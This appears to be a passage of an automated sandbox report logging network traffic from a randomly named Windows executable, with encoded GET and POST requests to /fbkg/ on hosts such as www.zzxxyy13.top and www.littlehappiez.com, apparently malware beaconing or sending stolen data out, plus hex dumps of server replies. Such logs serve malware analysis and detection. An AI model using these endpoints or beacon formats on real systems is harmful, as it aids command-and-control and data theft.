                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446450949 CET880OUTData Raw: 59 63 6f 32 72 2f 67 55 6d 47 69 61 38 41 73 30 35 63 54 6e 37 71 76 31 4d 32 2b 71 72 69 47 76 61 7a 2b 51 6b 48 4a 33 6a 72 4b 55 64 31 49 56 37 5a 36 4f 36 41 6e 42 65 55 32 4c 78 4e 64 7a 48 76 59 52 49 39 46 32 52 77 53 51 46 6c 6d 47 33 56
                                                                                                                                                                                                Data Ascii: Yco2r/gUmGia8As05cTn7qv1M2+qriGvaz+QkHJ3jrKUd1IV7Z6O6AnBeU2LxNdzHvYRI9F2RwSQFlmG3VH/umsFETyQvbrJU/iHnPe/6kOouNUjuYCTJC4ua0cvEXYvVkRMc/q8tVpjqlLLHke6Iby2aBE5v5yBJc4pk9f4rQ55tOYnAbluXlF1c5vIkI/BM6EwGroG1te8IqHrULJpi+UOxw0QY7EVCUP+qynjJySCrHVxZGo
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446619987 CET883OUTData Raw: 77 4e 4c 4d 78 57 2b 6d 57 6e 47 6a 4e 66 64 4f 30 54 35 37 4c 74 78 58 6e 42 5a 79 37 64 74 35 4c 63 37 4e 58 48 64 4f 67 58 66 71 4b 7a 43 34 55 58 7a 69 4e 6c 43 57 4f 36 31 56 42 49 73 48 35 5a 61 68 46 71 78 58 49 6c 74 78 5a 70 74 5a 38 2b
                                                                                                                                                                                                Data Ascii: wNLMxW+mWnGjNfdO0T57LtxXnBZy7dt5Lc7NXHdOgXfqKzC4UXziNlCWO61VBIsH5ZahFqxXIltxZptZ8+39upFw8jukZG/hyEwtcd4sBUA+cO8Lvj84xo4UTd+BE1nB3Eanb70FhH7jBUkec8NVo8UMV5K+W0b9ssKVTOOnEl9guVVnrZe0BJSytnoroWVjZ62d25nQGu/q1By0Pfu7SquGpbPZ+0xMHFHyGyzanKH0kpRpQGb
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768614054 CET885OUTData Raw: 70 64 57 75 78 2b 76 33 77 50 4e 4b 31 33 37 79 4b 55 69 31 33 49 66 47 56 79 51 38 65 59 76 78 64 30 5a 66 6d 31 5a 38 64 4f 4e 56 32 35 53 6f 33 45 66 7a 62 70 68 57 69 75 78 4f 66 55 4d 39 62 4b 4a 6b 71 57 43 78 57 63 41 59 61 6a 61 44 54 41
                                                                                                                                                                                                Data Ascii: pdWux+v3wPNK137yKUi13IfGVyQ8eYvxd0Zfm1Z8dONV25So3EfzbphWiuxOfUM9bKJkqWCxWcAYajaDTAYazfR9ukj2b1e7zijcvjsvkphru5f11ihGabuISyyf+Ecd9kB73ImfwjxZHGnfqJaA+3ekCJokpiBzky3sZNPwcmzt9Ui09x0bZxBE1pZGlvMScpupAjBF4A1wdWROmlVAo9J0ps+zxCJk01defZNho34Am22Lr1p
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768784046 CET888OUTData Raw: 47 4c 4c 4d 49 4d 59 67 41 55 4c 43 4e 64 67 77 41 6b 33 4f 71 6c 47 78 4e 50 71 4c 7a 58 49 49 38 55 6b 4b 6f 62 4f 48 57 37 4a 4e 70 4d 77 6e 35 41 64 6f 6d 47 56 79 6b 58 52 75 54 54 4e 6c 78 4e 70 42 36 7a 43 49 2b 63 4c 32 5a 53 51 2b 79 71
                                                                                                                                                                                                Data Ascii: GLLMIMYgAULCNdgwAk3OqlGxNPqLzXII8UkKobOHW7JNpMwn5AdomGVykXRuTTNlxNpB6zCI+cL2ZSQ+yqeQT4Qn+51xGt26Q2IkMa0Mn2XJfHCiKJn6T/BMBAvDzJ22K8HW99+IC94HMIIAGs4ig8JMZ9PJupPyDK4EQ/uuYNWR3/4/mwVFxs3ZlLBa/sq7789j5YAklhoxS4oiPOXg03sZyOtyxmOH2GKndGiLZ9Ut9EC3Ux/
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768867016 CET893OUTData Raw: 46 4b 30 70 4b 41 73 79 58 35 54 51 38 6b 54 4e 4c 2f 2b 42 64 61 49 31 37 74 68 59 73 35 4b 77 5a 50 67 6e 74 4d 52 77 32 4e 41 38 43 30 44 4a 76 6c 63 63 73 65 62 50 6a 47 43 45 32 6e 50 6f 76 74 32 6d 77 5a 67 74 74 54 4e 53 6e 31 45 71 48 30
                                                                                                                                                                                                Data Ascii: FK0pKAsyX5TQ8kTNL/+BdaI17thYs5KwZPgntMRw2NA8C0DJvlccsebPjGCE2nPovt2mwZgttTNSn1EqH05sUAfWhHrjGakksE3LQ1oGlHktsnNoZOPg7DLj0SJiQqig40aOCcV8vx4svEsb8BS46/Qic8myW48LvY+XCYkgNAjB2g1CNQTavo3qSZtUwfaYTfxkUzE+BZNOhzuTGJnvxa/6d/h8iJOZPCkrmZEuT7ngyxp7YtO
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769489050 CET901OUTData Raw: 62 33 39 58 37 43 71 53 42 42 4f 4a 74 39 4a 4e 65 51 49 2f 30 62 6b 34 36 4f 51 6f 79 7a 56 34 48 6e 4f 54 6f 4f 48 62 47 73 6e 38 5a 58 54 66 6a 34 6c 66 63 65 4c 41 37 6e 72 66 31 57 49 64 61 62 6d 56 30 51 42 70 64 50 62 72 34 56 62 76 6d 50
                                                                                                                                                                                                Data Ascii: b39X7CqSBBOJt9JNeQI/0bk46OQoyzV4HnOToOHbGsn8ZXTfj4lfceLA7nrf1WIdabmV0QBpdPbr4VbvmP6WEehq4WT0t4rfdm5Ahu7tfMDy7TdjOL51PveRTnm6KP+TteDuZO6RsWxgJOgDdUBHhf/X3dsyDQv3ug2HmjhwRlxeLkT8M/bHtce6RCLxnhEWJc1yS+NI496EYR0TnwINs5uvMsE/getnd5ZNxjUk0QR59uYB5ny
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769656897 CET908OUTData Raw: 4b 39 65 2f 4b 33 2b 62 67 54 63 6f 58 6d 6d 52 74 32 39 50 64 56 72 56 41 62 4f 33 63 6f 76 7a 45 45 44 39 38 38 31 65 6f 65 79 61 79 72 6c 47 57 64 74 47 76 55 53 48 6b 33 54 58 33 31 59 63 34 4e 35 5a 61 68 64 4c 34 51 58 4a 33 61 69 72 75 46
                                                                                                                                                                                                Data Ascii: K9e/K3+bgTcoXmmRt29PdVrVAbO3covzEED9881eoeyayrlGWdtGvUSHk3TX31Yc4N5ZahdL4QXJ3airuFyk3VER0hbizOCcHiDVlfFzlHvzOWXq06B4yZbAdUwoomxy+w/xqnW5QT8xjKhwHV/Dbag8niB9wjfCMU6y9mmOX+67Cpogf18iDjET8p3qrz1C/TH2PAYexb8e2JbPvVAmRfzXD9XUw5uXYUUIu3xmPZbAPkx5817


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                38160.202.170.2180192.168.11.2050165C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:07.964027882 CET909OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=phdEJzY3z123NWJi2+fkwEMFilDirFFbJmqiBLbxbwYPRraRZTedw0TneWwvlFl/lqwQMG1RzPJyvsXQPPSKc8SU/NqM8DtUSg== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:08.285720110 CET910INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:12 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                38192.168.11.2050165160.202.170.2180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:07.964027882 CET909OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=phdEJzY3z123NWJi2+fkwEMFilDirFFbJmqiBLbxbwYPRraRZTedw0TneWwvlFl/lqwQMG1RzPJyvsXQPPSKc8SU/NqM8DtUSg== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:08.285720110 CET910INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:12 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                3923.227.38.7480192.168.11.2050166C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:13.594327927 CET911OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.littlehappiez.com
                                                                                                                                                                                                Referer: http://www.littlehappiez.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 74 52 4a 4b 7a 2b 4c 35 2f 79 6d 31 4b 4f 34 6c 76 47 32 39 56 4b 2b 2f 6e 6c 37 6f 76 54 79 41 73 45 6a 37 39 43 58 48 59 58 65 51 4f 4e 71 34 4b 4f 74 2b 59 76 75 4d 6f 4a 46 36 7a 6e 2f 55 7a 72 43 78 76 52 58 4d 4e 77 53 73 43 50 66 6f 57 38 48 67 4c 57 61 5a 4f 6f 69 6e 75 4e 50 55 56 47 77 77 52 66 72 4c 2f 70 4d 38 4b 72 57 73 39 76 54 2b 34 36 79 53 6a 2f 4d 70 70 68 69 64 31 58 4c 6a 4d 45 74 46 76 30 73 6a 6e 47 6c 64 6f 78 4e 39 64 32 59 52 31 4c 39 58 78 4c 77 33 54 38 31 7a 37 31 6c 61 78 47 2b 61 45 57 45 6f 59 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=tRJKz+L5/ym1KO4lvG29VK+/nl7ovTyAsEj79CXHYXeQONq4KOt+YvuMoJF6zn/UzrCxvRXMNwSsCPfoW8HgLWaZOoinuNPUVGwwRfrL/pM8KrWs9vT+46ySj/Mpphid1XLjMEtFv0sjnGldoxN9d2YR1L9XxLw3T81z71laxG+aEWEoYQ==
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846436977 CET912INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:13 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Content-Language: en-US
                                                                                                                                                                                                Set-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:13 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:13 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_y=08c3332e-958f-4436-bf19-c3821f6a126c; Expires=Sat, 16-Nov-24 18:30:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_s=2439e814-5c8f-4244-b5b5-edf4f5d196b0; Expires=Fri, 17-Nov-23 19:00:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Server-Timing: processing;dur=111
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefron
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846538067 CET913INData Raw: 26 73 6f 75 72 63 65 25 35 42 75 75 69 64 25 35 44 3d 36 62 36 37 61 34 30 62 2d 66 32 38 30 2d 34 61 33 61 2d 61 66 36 37 2d 64 38 39 37 34 31 35 38 66 37 39 38 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f
                                                                                                                                                                                                Data Ascii: &source%5Buuid%5D=6b67a40b-f280-4a3a-af67-d8974158f798X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&sour
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846610069 CET915INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846662045 CET915INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846714973 CET915INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                39192.168.11.205016623.227.38.7480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:13.594327927 CET911OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.littlehappiez.com
                                                                                                                                                                                                Referer: http://www.littlehappiez.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 74 52 4a 4b 7a 2b 4c 35 2f 79 6d 31 4b 4f 34 6c 76 47 32 39 56 4b 2b 2f 6e 6c 37 6f 76 54 79 41 73 45 6a 37 39 43 58 48 59 58 65 51 4f 4e 71 34 4b 4f 74 2b 59 76 75 4d 6f 4a 46 36 7a 6e 2f 55 7a 72 43 78 76 52 58 4d 4e 77 53 73 43 50 66 6f 57 38 48 67 4c 57 61 5a 4f 6f 69 6e 75 4e 50 55 56 47 77 77 52 66 72 4c 2f 70 4d 38 4b 72 57 73 39 76 54 2b 34 36 79 53 6a 2f 4d 70 70 68 69 64 31 58 4c 6a 4d 45 74 46 76 30 73 6a 6e 47 6c 64 6f 78 4e 39 64 32 59 52 31 4c 39 58 78 4c 77 33 54 38 31 7a 37 31 6c 61 78 47 2b 61 45 57 45 6f 59 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=tRJKz+L5/ym1KO4lvG29VK+/nl7ovTyAsEj79CXHYXeQONq4KOt+YvuMoJF6zn/UzrCxvRXMNwSsCPfoW8HgLWaZOoinuNPUVGwwRfrL/pM8KrWs9vT+46ySj/Mpphid1XLjMEtFv0sjnGldoxN9d2YR1L9XxLw3T81z71laxG+aEWEoYQ==
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846436977 CET912INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:13 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Content-Language: en-US
                                                                                                                                                                                                Set-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:13 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:13 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_y=08c3332e-958f-4436-bf19-c3821f6a126c; Expires=Sat, 16-Nov-24 18:30:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_s=2439e814-5c8f-4244-b5b5-edf4f5d196b0; Expires=Fri, 17-Nov-23 19:00:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Server-Timing: processing;dur=111
                                                                                                                                                                                                X-Shopify-Stage: production
